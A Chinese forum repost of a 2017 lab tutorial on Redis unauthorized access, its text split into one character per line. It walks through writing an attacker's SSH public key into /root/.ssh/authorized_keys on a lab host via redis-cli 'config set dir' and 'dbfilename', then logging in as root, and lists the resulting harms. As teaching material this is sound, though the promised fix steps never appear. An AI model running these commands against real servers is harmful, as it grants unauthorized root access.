论坛
BBS
空间测绘
发表
发布文章
提问答疑
搜索
您还未登录
登录后即可体验更多功能
立即登录
我的收藏
提问答疑
我要投稿
漏洞
[19119] 2017-10-13_【实验】Redis未授权访问漏洞
文档创建者:
s7ckTeam
浏览次数:
16
最后更新:
2025-01-18
漏洞
16 人阅读
|
0 人回复
s7ckTeam
s7ckTeam
当前离线
积分
-54
6万
主题
-6万
回帖
-54
积分
管理员
积分
-54
发消息
2017-10-13_【实验】Redis未授权访问漏洞
【
实
验
】
R
e
d
i
s
未
授
权
访
问
漏
洞
i
春
秋
2
0
1
7
-
1
0
-
1
3
R
e
d
i
s
是
一
个
开
源
的
使
用
A
N
S
I
C
语
言
编
写
、
支
持
网
络
、
可
基
于
内
存
亦
可
持
久
化
的
日
志
型
、
K
e
y
-
V
a
l
u
e
数
据
库
,
并
提
供
多
种
语
言
的
A
P
I
。
R
e
d
i
s
暴
露
在
公
网
,
并
且
没
有
开
启
相
关
认
证
和
添
加
相
关
安
全
策
略
情
况
下
可
以
导
致
任
意
用
户
在
可
以
访
问
目
标
服
务
器
的
情
况
下
未
授
权
访
问
R
e
d
i
s
以
及
读
取
R
e
d
i
s
的
数
据
。
利
用
R
e
d
i
s
自
身
的
相
关
方
法
,
可
以
进
行
写
文
件
操
作
,
有
心
人
士
可
以
成
功
将
自
己
的
公
钥
写
入
目
标
服
务
器
的
/
r
o
o
t
/
.
s
s
h
文
件
夹
的
a
u
t
h
o
t
r
i
z
e
d
_
k
e
y
s
文
件
中
,
进
而
可
以
直
接
登
录
目
标
服
务
器
。
R
e
d
i
s
作
为
数
据
库
,
保
存
着
各
种
各
样
的
数
据
,
如
果
存
在
未
授
权
访
问
的
情
况
,
将
会
导
致
数
据
的
泄
露
,
其
中
包
含
保
存
的
用
户
信
息
等
。
近
期
又
出
现
R
e
d
i
s
未
授
权
访
问
配
合
S
S
H
k
e
y
文
件
被
利
用
的
情
况
,
导
致
一
大
批
R
e
d
i
s
服
务
器
被
黑
。
今
天
小
编
带
大
家
了
解
漏
洞
原
理
基
础
知
识
,
通
过
实
验
掌
握
对
该
漏
洞
的
修
补
方
法
吧
~
实
验
工
具
实
验
工
具
K
a
l
i
:
:
K
a
l
i
L
i
n
u
x
是
基
于
D
e
b
i
a
n
的
L
i
n
u
x
发
行
版
,
设
计
用
于
数
字
取
证
操
作
系
统
。
由
O
f
f
e
n
s
i
v
e
S
e
c
u
r
i
t
y
L
t
d
维
护
和
资
助
。
R
e
d
i
s
:
:
R
e
d
i
s
是
一
个
开
源
的
使
用
A
N
S
I
C
语
言
编
写
、
支
持
网
络
、
可
基
于
内
存
亦
可
持
久
化
的
日
志
型
、
K
e
y
-
V
a
l
u
e
数
据
库
,
并
提
供
多
种
语
言
的
A
P
I
。
实
验
步
骤
实
验
步
骤
步
骤
步
骤
1
:
了
解
原
理
:
了
解
原
理
部
分
R
e
d
i
s
默
认
绑
定
在
0
.
0
.
0
.
0
:
6
3
7
9
,
并
且
没
有
开
启
认
证
(
这
是
R
e
d
i
s
的
默
认
配
置
)
,
如
果
没
有
进
行
采
用
相
关
的
策
略
,
比
如
添
加
防
火
墙
规
则
避
免
其
他
非
信
任
来
源
i
p
访
问
等
,
将
会
导
致
R
e
d
i
s
服
务
直
接
暴
露
在
公
网
上
,
导
致
其
他
用
户
可
以
直
接
在
非
授
权
情
况
下
直
接
访
问
R
e
d
i
s
服
务
并
进
行
相
关
操
作
。
利
用
R
e
d
i
s
自
身
的
提
供
的
c
o
n
f
i
g
命
令
,
可
以
进
行
写
文
件
操
作
,
对
方
可
以
成
功
将
自
己
的
公
钥
写
入
目
标
服
务
器
的
/
r
o
o
t
/
.
s
s
h
文
件
夹
的
a
u
t
h
o
t
r
i
z
e
d
_
k
e
y
s
文
件
中
,
进
而
可
以
直
接
使
用
对
应
的
私
钥
登
录
目
标
服
务
器
。
步
骤
步
骤
2
:
在
本
地
生
产
公
私
钥
文
件
:
在
本
地
生
产
公
私
钥
文
件
打
开
k
a
l
i
,
新
建
一
个
终
端
,
输
入
命
令
s
s
h
-
k
e
y
g
e
n
-
t
r
s
a
,
在
本
地
生
产
公
私
钥
文
件
。
之
后
,
会
提
示
你
输
入
一
个
密
码
,
注
意
此
处
的
密
码
长
度
要
大
于
等
于
4
个
字
符
,
输
入
一
个
密
码
之
后
,
按
照
提
示
重
新
输
入
密
码
进
行
确
认
。
如
果
返
回
上
图
的
界
面
,
表
示
公
私
钥
生
产
成
功
。
步
骤
步
骤
3
:
将
公
钥
写
入
:
将
公
钥
写
入
f
o
o
.
t
x
t
文
件
文
件
接
下
来
我
们
需
要
将
第
一
步
生
成
的
公
钥
写
入
一
个
指
定
的
文
件
,
这
里
我
们
写
入
f
o
o
.
t
x
t
文
件
中
。
执
行
命
令
(
e
c
h
o
-
e
"
n
n
"
;
c
a
t
~
/
.
s
s
h
/
i
d
_
r
s
a
.
p
u
b
;
e
c
h
o
-
e
"
n
n
"
)
>
/
t
m
p
/
f
o
o
.
t
x
t
执
行
上
述
命
令
后
,
会
在
t
m
p
目
录
下
面
生
成
一
个
f
o
o
.
t
x
t
的
文
件
,
里
面
包
含
着
我
们
所
需
要
的
公
钥
。
步
骤
步
骤
4
:
连
接
:
连
接
R
e
d
i
s
写
入
文
件
写
入
文
件
利
用
R
e
d
i
s
自
身
的
提
供
的
c
o
n
f
i
g
命
令
,
可
以
进
行
写
文
件
操
作
,
对
方
可
以
成
功
将
自
己
的
公
钥
写
入
目
标
服
务
器
的
/
r
o
o
t
/
.
s
s
h
文
件
夹
的
a
u
t
h
o
t
r
i
z
e
d
_
k
e
y
s
文
件
中
,
进
而
可
以
直
接
使
用
对
应
的
私
钥
登
录
目
标
服
务
器
。
首
先
我
们
执
行
命
令
c
a
t
/
t
m
p
/
f
o
o
.
t
x
t
|
r
e
d
i
s
-
c
l
i
-
h
1
7
2
.
1
6
.
1
2
.
2
-
p
6
3
7
9
-
x
s
e
t
c
r
a
c
k
i
t
-
h
后
面
跟
的
是
目
标
机
器
的
i
p
地
址
,
-
p
后
面
跟
的
是
r
e
d
i
s
绑
定
的
端
口
号
,
效
果
如
下
接
下
来
执
行
命
令
,
去
连
接
目
标
主
机
。
r
e
d
i
s
-
c
l
i
-
h
1
7
2
.
1
6
.
1
2
.
2
-
p
6
3
7
9
同
理
-
h
后
面
跟
的
是
目
标
机
器
的
i
p
地
址
,
-
p
后
面
跟
的
是
r
e
d
i
s
绑
定
的
端
口
号
。
同
理
-
h
后
面
跟
的
是
目
标
机
器
的
i
p
地
址
,
-
p
后
面
跟
的
是
r
e
d
i
s
绑
定
的
端
口
号
。
连
接
成
功
之
后
,
我
们
依
次
执
行
以
下
四
条
命
令
:
c
o
n
f
i
g
s
e
t
d
i
r
/
r
o
o
t
/
.
s
s
h
/
c
o
n
f
i
g
g
e
t
d
i
r
c
o
n
f
i
g
s
e
t
d
b
f
i
l
e
n
a
m
e
"
a
u
t
h
o
r
i
z
e
d
_
k
e
y
s
"
s
a
v
e
e
x
i
t
如
果
返
回
结
果
和
上
图
相
符
表
示
写
入
成
功
。
步
骤
步
骤
5
:
通
过
:
通
过
S
S
H
登
录
目
标
主
机
登
录
目
标
主
机
接
下
来
连
接
目
标
主
机
,
按
照
提
示
输
入
之
前
设
置
好
的
密
码
即
可
登
录
成
功
。
执
行
命
令
:
s
s
h
r
o
o
t
@
1
7
2
.
1
6
.
1
2
.
2
-
p
2
2
-
i
~
/
.
s
s
h
/
i
d
_
r
s
a
来
查
看
一
下
i
p
地
址
,
确
认
登
录
成
功
。
最
后
输
入
以
下
命
令
查
看
i
p
a
d
d
r
e
s
s
s
h
o
w
实
验
结
果
分
析
与
总
结
实
验
结
果
分
析
与
总
结
R
e
d
i
s
未
授
权
访
问
可
能
造
成
的
危
害
未
授
权
访
问
可
能
造
成
的
危
害
1
.
数
据
库
数
据
泄
露
:
R
e
d
i
s
作
为
数
据
库
,
保
存
着
各
种
各
样
的
数
据
,
如
果
存
在
未
授
权
访
问
的
情
况
,
将
会
导
致
数
据
的
泄
露
,
其
中
包
含
保
存
的
用
户
信
息
等
。
2
.
代
码
执
行
:
R
e
d
i
s
可
以
嵌
套
L
u
a
脚
本
的
特
性
将
会
导
致
代
码
执
行
,
危
害
同
其
他
服
务
器
端
的
代
码
执
行
。
3
.
敏
感
信
息
泄
露
:
通
过
R
e
d
i
s
的
I
N
F
O
命
令
,
可
以
查
看
服
务
器
相
关
的
参
数
和
敏
感
信
息
,
为
对
方
的
后
续
渗
透
做
铺
垫
。
戳
阅
读
原
文
,
学
i
春
秋
海
量
课
程
~
阅
读
原
文
回复
举报
上一个主题
下一个主题
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
本版积分规则
发表回复
!disable!!post_parseurl!
使用Markdown编辑器编辑
使用富文本编辑器编辑
回帖后跳转到最后一页